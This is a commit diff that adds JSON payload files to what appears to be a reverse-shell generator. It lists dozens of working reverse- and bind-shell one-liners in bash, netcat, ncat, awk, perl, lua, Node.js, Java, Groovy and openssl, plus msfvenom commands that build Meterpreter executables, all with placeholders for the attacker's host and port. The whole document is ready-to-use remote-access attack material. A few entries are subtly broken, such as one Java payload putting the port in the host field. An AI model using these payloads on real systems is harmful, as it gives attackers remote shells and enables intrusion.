Json refactor + quiet + id option

payloads/awk.json

@@ -0,0 +1,9 @@
+[
+  {
+    "type": "awk",
+    "direction": "reverse",
+    "payload": "awk 'BEGIN {s = \"/inet/tcp/0/{LHOST}/{LPORT}\"; while(42) { do{ printf \"shell>\" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != \"exit\") close(s); }}' /dev/null",
+    "note": null,
+    "id": "awk1"
+  }
+]

payloads/bash.json

@@ -0,0 +1,65 @@
+[
+  {
+    "type": "bash",
+    "direction": "reverse",
+    "payload": "/bin/bash -c '/bin/bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1'",
+    "note": null,
+    "id": "bash1"
+  },
+  {
+    "type": "bash",
+    "direction": "reverse",
+    "payload": "/bin/bash -c '/bin/bash -i > /dev/tcp/{LHOST}/{LPORT} 0<&1 2>&1'",
+    "note": null,
+    "id": "bash2"
+  },
+  {
+    "type": "bash",
+    "direction": "reverse",
+    "payload": "/bin/bash -i > /dev/tcp/{LHOST}/{LPORT} 0<& 2>&1",
+    "note": null,
+    "id": "bash3"
+  },
+  {
+    "type": "bash",
+    "direction": "reverse",
+    "payload": "bash -i >& /dev/tcp/{LHOST}/{LPORT} 0>&1",
+    "note": null,
+    "id": "bash4"
+  },
+  {
+    "type": "bash",
+    "direction": "reverse",
+    "payload": "exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do $line 2>&5 >&5; done",
+    "note": null,
+    "id": "bash5"
+  },
+  {
+    "type": "bash",
+    "direction": "reverse",
+    "payload": "exec /bin/sh 0</dev/tcp/{LHOST}/{LPORT} 1>&0 2>&0",
+    "note": null,
+    "id": "bash6"
+  },
+  {
+    "type": "bash",
+    "direction": "reverse",
+    "payload": "0<&196;exec 196<>/dev/tcp/{LHOST}/{LPORT}; sh <&196 >&196 2>&196",
+    "note": null,
+    "id": "bash7"
+  },
+  {
+    "type": "bash",
+    "direction": "reverse",
+    "payload": "bash -i >& /dev/udp/{LHOST}/{LPORT} 0>&1",
+    "note": "UDP",
+    "id": "bash8"
+  },
+  {
+    "type": "bash",
+    "direction": "reverse",
+    "payload": "nc -u -lvp {LPORT}",
+    "note": "UDP Listener (attacker)",
+    "id": "bash9"
+  }
+]

payloads/groovy.json

@@ -0,0 +1,16 @@
+[
+  {
+    "type": "groovy",
+    "direction": "reverse",
+    "payload": "String host=\"{LHOST}\";\nint port={LPORT};\nString cmd=\"cmd.exe\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();",
+    "note": null,
+    "id": "groovy1"
+  },
+  {
+    "type": "groovy",
+    "direction": "reverse",
+    "payload": "Thread.start {        // Reverse shell here        }",
+    "note": "More stealthy",
+    "id": "groovy2"
+  }
+]

payloads/java.json

@@ -0,0 +1,23 @@
+[
+  {
+    "type": "java",
+    "direction": "reverse",
+    "payload": "r = Runtime.getRuntime()\np = r.exec([\"/bin/bash\",\"-c\",\"exec 5<>/dev/tcp/{LHOST}/{LPORT};cat <&5 | while read line; do $line 2>&5 >&5; done\"] as String[])\np.waitFor()",
+    "note": null,
+    "id": "java1"
+  },
+  {
+    "type": "java",
+    "direction": "reverse",
+    "payload": "String host=\"{LPORT}\";\nint port={LPORT};\nString cmd=\"cmd.exe\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();",
+    "note": null,
+    "id": "java2"
+  },
+  {
+    "type": "java",
+    "direction": "reverse",
+    "payload": "Thread thread = new Thread(){public void run(){        //Reverse shell here        }}thread.start();",
+    "note": "More stealthy",
+    "id": "java3"
+  }
+]

payloads/lua.json

@@ -0,0 +1,16 @@
+[
+  {
+    "type": "lua",
+    "direction": "reverse",
+    "payload": "lua -e \"require('socket');require('os');t=socket.tcp();t:connect('{LHOST}','{LPORT}');os.execute('/bin/sh -i <&3 >&3 2>&3');\"",
+    "note": "Linux",
+    "id": "lua1"
+  },
+  {
+    "type": "lua",
+    "direction": "reverse",
+    "payload": "lua5.1 -e 'local host, port = \"{LHOST}\", {LPORT} local socket = require(\"socket\") local tcp = socket.tcp() local io = require(\"io\") tcp:connect(host, port); while true do local cmd, status, partial = tcp:receive() local f = io.popen(cmd, \"r\") local s = f:read(\"*a\") f:close() tcp:send(s) if status == \"closed\" then break end end tcp:close()' ",
+    "note": "Windows",
+    "id": "lua2"
+  }
+]

payloads/meterpreter.json

@@ -0,0 +1,93 @@
+[  
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f elf > shell.elf",
+    "note": null,
+    "id": "meterpreter1"
+  },
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p windows/meterpreter/reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f exe > shell.exe",
+    "note": null,
+    "id": "meterpreter2"
+  },
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p osx/x86/shell_reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f macho > shell.macho",
+    "note": null,
+    "id": "meterpreter3"
+  },
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p windows/meterpreter/reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f asp > shell.asp",
+    "note": null,
+    "id": "meterpreter4"
+  },
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p java/jsp_shell_reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f raw > shell.jsp",
+    "note": null,
+    "id": "meterpreter5"
+  },
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p java/jsp_shell_reverse_tcp LHOST=\"{LHOST}\" LPORT={LPORT} -f war > shell.war",
+    "note": null,
+    "id": "meterpreter6"
+  },
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p cmd/unix/reverse_python LHOST=\"{LHOST}\" LPORT={LPORT} -f raw > shell.py",
+    "note": null,
+    "id": "meterpreter7"
+  },
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p cmd/unix/reverse_bash LHOST=\"{LHOST}\" LPORT={LPORT} -f raw > shell.sh",
+    "note": null,
+    "id": "meterpreter8"
+  },
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p cmd/unix/reverse_perl LHOST=\"{LHOST}\" LPORT={LPORT} -f raw > shell.pl",
+    "note": null,
+    "id": "meterpreter9"
+  },
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p windows/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe > reverse.exe",
+    "note": "Windows Staged reverse TCP",
+    "id": "meterpreter10"
+  },
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p windows/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f exe > reverse.exe",
+    "note": "Windows Stageless reverse TCP",
+    "id": "meterpreter11"
+  },
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf >reverse.elf",
+    "note": "Linux Staged reverse TCP",
+    "id": "meterpreter12"
+  },
+  {
+    "type": "meterpreter",
+    "direction": "reverse",
+    "payload": "msfvenom -p linux/x86/shell_reverse_tcp LHOST={LHOST} LPORT={LPORT} -f elf >reverse.elf",
+    "note": "Linux Stageless reverse TCP",
+    "id": "meterpreter13"
+  }
+]

payloads/ncat.json

@@ -0,0 +1,16 @@
+[
+  {
+    "type": "ncat",
+    "direction": "reverse",
+    "payload": "ncat {LHOST} {LPORT} -e /bin/bash",
+    "note": null,
+    "id": "ncat1"
+  },
+  {
+    "type": "ncat",
+    "direction": "reverse",
+    "payload": "ncat --udp {LHOST} {LPORT} -e /bin/bash",
+    "note": null,
+    "id": "ncat2"
+  }
+]

payloads/netcat.json

@@ -0,0 +1,65 @@
+[
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "nc -e /bin/sh {LHOST} {LPORT}",
+    "note": null,
+    "id": "netcat1"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "nc -e /bin/bash {LHOST} {LPORT}",
+    "note": null,
+    "id": "netcat2"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "nc -c bash {LHOST} {LPORT}",
+    "note": null,
+    "id": "netcat3"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "mknod backpipe p && nc {LHOST} {LPORT} 0<backpipe | /bin/bash 1>backpipe",
+    "note": null,
+    "id": "netcat4"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} >/tmp/f",
+    "note": null,
+    "id": "netcat5"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "rm -f /tmp/p; mknod /tmp/p p && nc {LHOST} {LPORT} 0/tmp/p 2>&1",
+    "note": null,
+    "id": "netcat6"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "rm f;mkfifo f;cat f|/bin/sh -i 2>&1|nc {LHOST} {LPORT} > f",
+    "note": null,
+    "id": "netcat7"
+  },
+  {
+    "type": "netcat",
+    "direction": "reverse",
+    "payload": "rm -f x; mknod x p && nc {LHOST} {LPORT} 0<x | /bin/bash 1>x",
+    "note": null,
+    "id": "netcat8"
+  },
+  {
+    "type": "netcat",
+    "direction": "bind",
+    "payload": "nc -lvp {LPORT} -e /bin/sh",
+    "note": null,
+    "id": "netcat9"
+  }
+]

payloads/nodejs.json

@@ -0,0 +1,23 @@
+[
+  {
+    "type": "nodejs",
+    "direction": "reverse",
+    "payload": "require('child_process').exec('nc -e /bin/sh {LHOST} {LPORT}')",
+    "note": null,
+    "id": "nodejs1"
+  },
+  {
+    "type": "nodejs",
+    "direction": "reverse",
+    "payload": "-var x = global.process.mainModule.require\n-x('child_process').exec('nc {LHOST} {LPORT} -e /bin/bash')",
+    "note": null,
+    "id": "nodejs2"
+  },
+  {
+    "type": "nodejs",
+    "direction": "reverse",
+    "payload": "(function(){\n    var net = require(\"net\"),\n        cp = require(\"child_process\"),\n        sh = cp.spawn(\"/bin/sh\", []);\n    var client = new net.Socket();\n    client.connect({LPORT}, \"{LHOST}\", function(){\n        client.pipe(sh.stdin);\n        sh.stdout.pipe(client);\n        sh.stderr.pipe(client);\n    });\n    return /a/; // Prevents the Node.js application form crashing\n})();",
+    "note": null,
+    "id": "nodejs3"
+  }
+]

payloads/openssl.json

@@ -0,0 +1,16 @@
+[ 
+  {
+    "type": "openssl",
+    "direction": "reverse",
+    "payload": "mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect {LHOST}:{LPORT} > /tmp/s; rm /tmp/s",
+    "note": null,
+    "id": "openssl1"
+  },
+  {
+    "type": "openssl",
+    "direction": "reverse",
+    "payload": "ncat --ssl -vv -l -p {LPORT}",
+    "note": "Listener (attacker)",
+    "id": "openssl2"
+  }
+]

payloads/perl.json

@@ -0,0 +1,23 @@
+[
+  {
+    "type": "perl",
+    "direction": "reverse",
+    "payload": "perl -e 'use Socket;$i=\"{LHOST}\";$p={LPORT};socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\">&S\");open(STDOUT,\">&S\");open(STDERR,\">&S\");exec(\"/bin/sh -i\");};'",
+    "note": null,
+    "id": "perl1"
+  },
+  {
+    "type": "perl",
+    "direction": "reverse",
+    "payload": "perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,\"{LHOST}:{LPORT}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
+    "note": null,
+    "id": "perl2"
+  },
+  {
+    "type": "perl",
+    "direction": "reverse",
+    "payload": "perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,\"{LHOST}:{LPORT}\");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'",
+    "note": "Windows",
+    "id": "perl3"
+  }
+]